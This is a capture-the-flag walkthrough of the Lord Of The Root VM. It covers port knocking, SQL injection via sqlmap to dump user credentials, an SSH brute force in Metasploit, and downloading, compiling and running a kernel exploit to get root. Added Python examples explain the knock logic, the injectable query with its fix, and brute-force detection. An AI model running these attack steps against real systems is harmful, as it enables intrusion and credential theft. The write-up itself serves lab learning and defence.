Lord Of The Root: 1.0.1

How about taking a look at port knocking?
Let's see how we can knock ports in this CTF!


Lab Environment


Attacker's Machine: Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux


Vulnerable Machine: Lord Of The Root: 1.0.1


Now let's scan the local network to which the attacking machine and the vulnerable machine are both connected.
Syntax Used: arp-scan --local
Victim machine: 192.168.59.135




Performing the enumeration of ports and services using nmap.


Syntax Used: nmap -A 192.168.59.135 -Pn
Results: Port 22 is open and the ssh service is active.




Tried connecting over ssh and got a hint to knock ports 1, 2, 3.
Syntax Used: ssh 192.168.59.135




Now scanning ports 1, 2 and 3 again, in the order given in the hint (the -r flag makes nmap probe the ports sequentially instead of in random order, which matters for a knock sequence).
Syntax Used: nmap -r -p1,2,3 -A 192.168.59.135 -Pn




Now running a full-port nmap scan again to see whether the knock changed anything.
Syntax Used: nmap -p- -A 192.168.59.135 -Pn
Results: the http service is now active on port 80.
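To make clear why the ordered knock opened port 80 while the earlier scans did not, here is a small model of the server side of port knocking. This is an added example written for this walkthrough, not code from the VM or from any knock daemon; it assumes the sequence 1, 2, 3 from the hint, a constructed 10-second timeout between knocks, and constructed source addresses. Any connection to a port outside the expected sequence resets that source's progress, which is why a randomized scan rarely completes the knock.

```python
from collections import defaultdict

# Knock sequence from the CTF hint. The timeout is a constructed value for this model.
KNOCK_SEQUENCE = (1, 2, 3)
KNOCK_TIMEOUT = 10.0   # seconds allowed between two consecutive knocks


class KnockTracker:
    """Track each source address's progress through the knock sequence.

    A source that hits the sequence ports in order, within the timeout, gets the
    protected service opened for it. A wrong port resets progress (unless it is
    the first port of the sequence, which simply restarts it).
    """

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self.progress = defaultdict(int)   # src_ip -> index of the next expected port
        self.last_seen = {}                # src_ip -> timestamp of the last knock
        self.opened_for = set()            # sources for which the door was opened

    def observe(self, src_ip, dst_port, ts):
        """Feed one inbound connection attempt; return True if it completed the sequence."""
        idx = self.progress[src_ip]
        # Too long since the previous knock: the partial sequence is stale.
        if src_ip in self.last_seen and ts - self.last_seen[src_ip] > self.timeout:
            idx = 0
        if dst_port == self.sequence[idx]:
            idx += 1
        elif dst_port == self.sequence[0]:
            idx = 1            # wrong port, but it is the first knock, so restart
        else:
            idx = 0            # any other port resets progress
        self.last_seen[src_ip] = ts
        if idx == len(self.sequence):
            self.opened_for.add(src_ip)
            self.progress[src_ip] = 0
            return True
        self.progress[src_ip] = idx
        return False

    def is_open(self, src_ip):
        return src_ip in self.opened_for


def run_demo():
    """Constructed traffic: an ordered knock, a randomized one, and a slow one."""
    tracker = KnockTracker()
    events = [
        # like "nmap -r -p1,2,3": sequential, well within the timeout
        ("10.0.0.5", 1, 0.0), ("10.0.0.5", 2, 0.5), ("10.0.0.5", 3, 1.0),
        # randomized order never completes the sequence
        ("10.0.0.6", 3, 0.0), ("10.0.0.6", 1, 0.1), ("10.0.0.6", 2, 0.2),
        # correct order but the second knock arrives after the timeout
        ("10.0.0.7", 1, 0.0), ("10.0.0.7", 2, 20.0), ("10.0.0.7", 3, 20.5),
    ]
    for src, port, ts in events:
        tracker.observe(src, port, ts)
    return sorted(tracker.opened_for)   # -> ["10.0.0.5"]


if __name__ == "__main__":
    print("door opened for:", run_demo())
```

The same model explains the author's sequence of scans: the first nmap -A run probes ports in randomized order and touches many other ports, so the sequence is reset before it completes, whereas -r -p1,2,3 delivers exactly the ordered knock.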




Browsing to the IP in a web browser, since the http service is active.




Now the usual approach again: browsing robots.txt.




A usual habit: viewing the source code of every page.
This time it helped me and gave me a base64 encoded string.




Decoding the base64 string in the terminal.
Syntax Used: echo "encoded string" | base64 -d
And again got another base64 encoded string.




Decoding the second string, which we got after decoding the first one.
Results: /978345210/index.php
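Nested encodings like this one are common in CTFs, so here is a helper that keeps decoding until the result is no longer valid base64. This is an added example, not part of the original write-up; it builds its own doubly-encoded sample from the path found above and stops when a layer either fails strict base64 validation or does not decode to printable text.

```python
import base64
import binascii


def _try_b64(s):
    """Return the decoded text if s is strictly valid base64 yielding printable UTF-8, else None."""
    try:
        raw = base64.b64decode(s.strip(), validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not text or not text.isprintable():
        return None
    return text


def decode_nested(encoded, max_layers=8):
    """Peel base64 layers off `encoded`; return every layer, outermost first, last is the plaintext."""
    layers = [encoded]
    current = encoded
    for _ in range(max_layers):
        nxt = _try_b64(current)
        if nxt is None:
            break
        layers.append(nxt)
        current = nxt
    return layers


def encode_layers(text, layers):
    """Wrap `text` in `layers` rounds of base64 (used to build the constructed sample)."""
    data = text.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


# Constructed sample: the path from the page, base64-encoded twice as on the VM's page source.
SAMPLE = encode_layers("/978345210/index.php", 2)

if __name__ == "__main__":
    for depth, layer in enumerate(decode_nested(SAMPLE)):
        print(f"layer {depth}: {layer}")
```

The stop rule is a heuristic: a plaintext made only of base64 characters with valid padding would be decoded one layer too far, which is why the function returns all layers rather than only the last one.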




Now browsing the URL with the above path.
Boom!! Got a login panel (which can be the entry point).
Tried a few things like auth bypass etc., but nothing proved successful.




Stuck, but sqlmap helped me.
Attacking the login form with sqlmap and extracting the databases.
Syntax Used: sqlmap -u "url/index.php" --forms --dbs --batch
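Since sqlmap was able to pull whole databases through this login form, the form must have spliced user input straight into its SQL. Here is an added example (not the VM's code, whose source is not shown on this page) contrasting that injectable pattern with the parameterized form that closes the hole, using an in-memory SQLite table with constructed rows standing in for the Users table sqlmap dumped.

```python
import sqlite3


def make_db():
    """Constructed sample: an in-memory Users table with made-up rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Passwords are stored in clear only to keep the sample short; a real
    # application should store a salted password hash instead.
    conn.executemany(
        "INSERT INTO Users (username, password) VALUES (?, ?)",
        [("user1", "sample-pass-1"), ("user2", "sample-pass-2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Injectable pattern: user input becomes part of the SQL text itself."""
    query = (
        "SELECT username FROM Users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Fixed pattern: placeholders; the driver passes values separately from the SQL."""
    row = conn.execute(
        "SELECT username FROM Users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"   # the classic tautology sqlmap's checks are built around
    print("vulnerable   :", login_vulnerable(db, "user1", probe))     # user1
    print("parameterized:", login_parameterized(db, "user1", probe))  # None
```

With the parameterized query the quote characters in the password are just bytes in a bound value, so there is no string for sqlmap to break out of; the query either matches a real row or nothing.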




Extracted the details of all the databases, but only Webapp contained something useful.
Now it's time to extract the tables of Webapp.
Syntax Used: sqlmap -u "url/index.php" --forms -D Webapp --tables --batch
Results: a Users table was present.




Dumping all the details of Users.
Syntax Used: sqlmap -u "url/index.php" --forms -D Webapp --tables --dump-all --batch
Copying the usernames obtained into a users.txt file and the passwords obtained into a pass.txt file.
Planning to brute force the ssh login with the ssh_login auxiliary module (auxiliary/scanner/ssh/ssh_login).


Firing up msfconsole from the terminal and using the ssh_login auxiliary module to brute force the ssh login.
Providing the necessary details as shown.
Sorry guys, I messed things up.
I missed one option, i.e. set RHOSTS to the victim's IP.
Finally, typing exploit runs the auxiliary with the provided users and pass files.
Results: a command shell is opened when the brute force succeeds.
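A credential-reuse attack like this one leaves a very recognisable trace in the victim's sshd log: a burst of failed password attempts from one source followed by an accepted login from the same source. Here is an added example of the detection logic, written for this walkthrough and not taken from the page; the log lines are constructed (hostname "victim", source addresses and usernames are made up), and the thresholds are tuning values chosen for the sample.

```python
import re
from collections import defaultdict, deque

# Constructed sshd log excerpt in syslog format. Only the time-of-day is used, so the
# sample assumes all lines fall on the same day.
SAMPLE_LOG = """\
Oct  9 12:00:01 victim sshd[1201]: Failed password for invalid user admin from 192.168.59.200 port 50110 ssh2
Oct  9 12:00:02 victim sshd[1203]: Failed password for user1 from 192.168.59.200 port 50111 ssh2
Oct  9 12:00:03 victim sshd[1205]: Failed password for user1 from 192.168.59.200 port 50112 ssh2
Oct  9 12:00:04 victim sshd[1207]: Failed password for user2 from 192.168.59.200 port 50113 ssh2
Oct  9 12:00:05 victim sshd[1209]: Failed password for user2 from 192.168.59.200 port 50114 ssh2
Oct  9 12:00:06 victim sshd[1211]: Failed password for user2 from 192.168.59.200 port 50115 ssh2
Oct  9 12:00:09 victim sshd[1213]: Accepted password for user2 from 192.168.59.200 port 50118 ssh2
Oct  9 12:04:30 victim sshd[1300]: Failed password for user1 from 192.168.59.10 port 40000 ssh2
Oct  9 12:05:00 victim sshd[1302]: Accepted publickey for user1 from 192.168.59.10 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^\w{3}\s+\d+ (?P<time>\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

FAIL_THRESHOLD = 5      # failures from one source inside WINDOW seconds -> brute force
SUCCESS_MIN_FAILURES = 3  # a success preceded by this many failures -> likely guessed creds
WINDOW = 60             # seconds


def parse_line(line):
    """Turn one sshd log line into an event dict, or None if it is not a login result."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mnt, s = (int(x) for x in m["time"].split(":"))
    return {"ts": h * 3600 + mnt * 60 + s, "result": m["result"],
            "user": m["user"], "ip": m["ip"]}


def detect(log_text, threshold=FAIL_THRESHOLD, window=WINDOW,
           success_min=SUCCESS_MIN_FAILURES):
    """Sliding-window detection over log lines; returns a list of alert tuples."""
    recent_failures = defaultdict(deque)   # ip -> timestamps of failures within the window
    already_flagged = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent_failures[ev["ip"]]
        while q and ev["ts"] - q[0] > window:   # drop failures older than the window
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in already_flagged:
                already_flagged.add(ev["ip"])
                alerts.append(("brute_force", ev["ip"], len(q)))
        elif len(q) >= success_min:
            # An accepted login right after a burst of failures from the same source
            # is the signature of a successful password-guessing run.
            alerts.append(("success_after_failures", ev["ip"], ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The single failure from 192.168.59.10 followed by a key-based login produces no alert, which is the point of the minimum-failure count: one mistyped password should not look like an attack, six in six seconds followed by a success should.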




Want to know the active sessions.
Type sessions -i
One session is open, having ID "1".
To access it:
Syntax Used: sessions -i 1




Spawning a proper tty shell.
Syntax Used: python -c 'import pty; pty.spawn("/bin/sh")'
And enumerating the kernel version to plan privilege escalation.
Syntax Used: uname -a




Downloading the suitable exploit into the temp directory of the machine using the wget utility.
Syntax Used: wget <download link address>
Results: the exploit is downloaded, named 39166.




Renaming 39166 to paras.c.
Syntax Used: mv 39166 paras.c




Now compiling the paras.c file with the gcc compiler.
Syntax Used: gcc paras.c -o paras




Executing the compiled binary named paras.
Syntax Used: ./paras
Results: gained root.




Reading Flag.txt in the root directory.
